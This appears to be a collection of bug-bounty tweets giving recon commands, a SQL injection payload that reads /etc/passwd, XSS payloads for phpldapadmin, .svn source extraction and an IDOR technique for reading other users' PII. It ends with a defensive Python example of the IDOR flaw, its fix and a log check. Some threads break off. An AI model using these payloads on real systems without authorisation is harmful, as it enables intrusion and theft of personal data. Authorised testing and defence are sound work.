How to access a company without being part of it with Google OAuth, using your Gmail account. [It only works if the company has a misconfiguration!] #bugbountytips #bugbounty
I hate recon, but here is a good tip:
1 - Get the company's IP range X.X.X.X/24
2 - Run nmap -p 80,448,8080 IP/24 -oN file.txt
3 - Use any IP extractor, or an API or bash in case of automation, then save the result to IPs.txt
4 - Run httpx -l IPs.txt -o final.txt
5 - Run nuclei -l final.txt
Nice ways to leverage SQL injection to LFI and RCE
LFI:
item=&search='+Union+Select+1,2,3,4,5,6,load_file("/etc/passwd")#
RCE:
In the SS 🥰
Uploading a shell 🥰
#bugbounty #bugbountytips
Add this endpoint to your wordlist
phpldapadmin/index.php
and try the default login
and if there's no luck
try these 2 XSSs
domain/phpldapadmin/cmd.php
domain/cmd.php
1/2
#bugbountytips #bugbountytip
cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1
cmd.php?server_id=<script>alert('Orwa')</script>
you can also try replacing cmd.php with index.php
2/2
Happy hunting
Old but gold #bugbountytip
add this to your wordlist
.svn/entries
or edit on the ready template
github.com/projectdiscove…
Ex:
admin/.svn/entries
next step if you locate the svn configuration
use svn-extractor
github.com/anantshri/svn-…
start looking for bugs in the source
First Morning in #Ramadan ❤️🔥💪
#Tip :
Always try subdomain fuzzing. A year ago I found RCE & SQLi in XXX[.]target[.]com. Today I tried to fuzz subdomains for this sub, like XXXFUZZ[.]target[.]com, and I found XXXtest1[.]target[.]com, and it was the same backend :)
#bugbountytips
Check my new tools for #bugbounty; they just came public now
github.com/orwagodfather/…
github.com/orwagodfather/…
and don't forget to check my updated wordlists
Thanks
#bugbountytip #bugbountytips
Wildest auth bypass I’ve ever seen in my entire career!
PHP+MySQL+[]= Recipe for BUGS!
Auth bypass bugs are often simple; just try any wild idea that pops into your mind. You're a hacker, and those ideas didn't come from nowhere!
#BugBounty #bugbountytips #bugbountytip #Bugcrowd
Exciting News: My Second Write-Up is Now Available!
medium.com/@HX007/a-journ…
Dive into the details of the bounty that ranks as the 3rd highest I’ve received on bugcrowd
"A Journey of Limited Path Traversal To RCE With $40,000 Bounty!"
Collaborated with Godfather Orwa 🇯🇴,
This
Last month, I was able to view millions of orders from a well-known coffee chain using a very simple but strange vulnerability.
Here is how:
1/ Found a domain manage-bxy-orders.target.com with login and reset password page. Immediately knew this was meant for internal employees.
2/
Always check for IDs disclosed in the response:
1. Found a JSON POST request without a user ID that fetches user information in the response
2. Added a new parameter "user_id":<victim's ID> to the request body
3. Victim's full PII details fetched in the response
#bugcrowd #bugbountytips
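The pattern behind that IDOR, as an added example that is not part of any of these posts: a constructed Python handler that mirrors the bug (the normal request carries no user_id, but the server honours one if the client adds it), the hardened handler that takes identity only from the server-side session, and a check over constructed access-log lines that flags a body user_id disagreeing with the session user. The endpoint path, log format and user records are all assumptions made for the example.

```python
import json
import re

# Constructed sample records standing in for the portal's user store.
USERS = {
    101: {"id": 101, "name": "Alice", "email": "alice@example.invalid"},
    202: {"id": 202, "name": "Bob", "email": "bob@example.invalid"},
}


def fetch_user_vulnerable(session_user_id: int, body: str) -> dict:
    """Vulnerable pattern: the normal request has no user_id, so the handler
    falls back to the session, but a client-supplied user_id overrides it.
    That is exactly the parameter injection described in the tweet."""
    params = json.loads(body) if body else {}
    target = int(params.get("user_id", session_user_id))
    return USERS.get(target, {})


def fetch_user_fixed(session_user_id: int, body: str) -> dict:
    """Hardened: identity comes only from the server-side session. The body
    is still parsed (so malformed JSON fails loudly) but never trusted for
    identity; an unexpected user_id in it is a signal worth logging."""
    _ = json.loads(body) if body else {}
    return USERS.get(session_user_id, {})


# Assumed access-log layout: 'POST /api/user session_user=<id> body=<json>'.
LOG_RE = re.compile(r"session_user=(?P<sess>\d+) body=(?P<body>\{.*\})$")


def flags_identity_override(log_line: str) -> bool:
    """Detection aid: True when the logged body carries a user_id that differs
    from the authenticated session user, which is the thing to alert on while
    the fix is being rolled out."""
    m = LOG_RE.search(log_line)
    if not m:
        return False
    try:
        body = json.loads(m.group("body"))
    except json.JSONDecodeError:
        return False
    claimed = body.get("user_id")
    return claimed is not None and str(claimed) != m.group("sess")
```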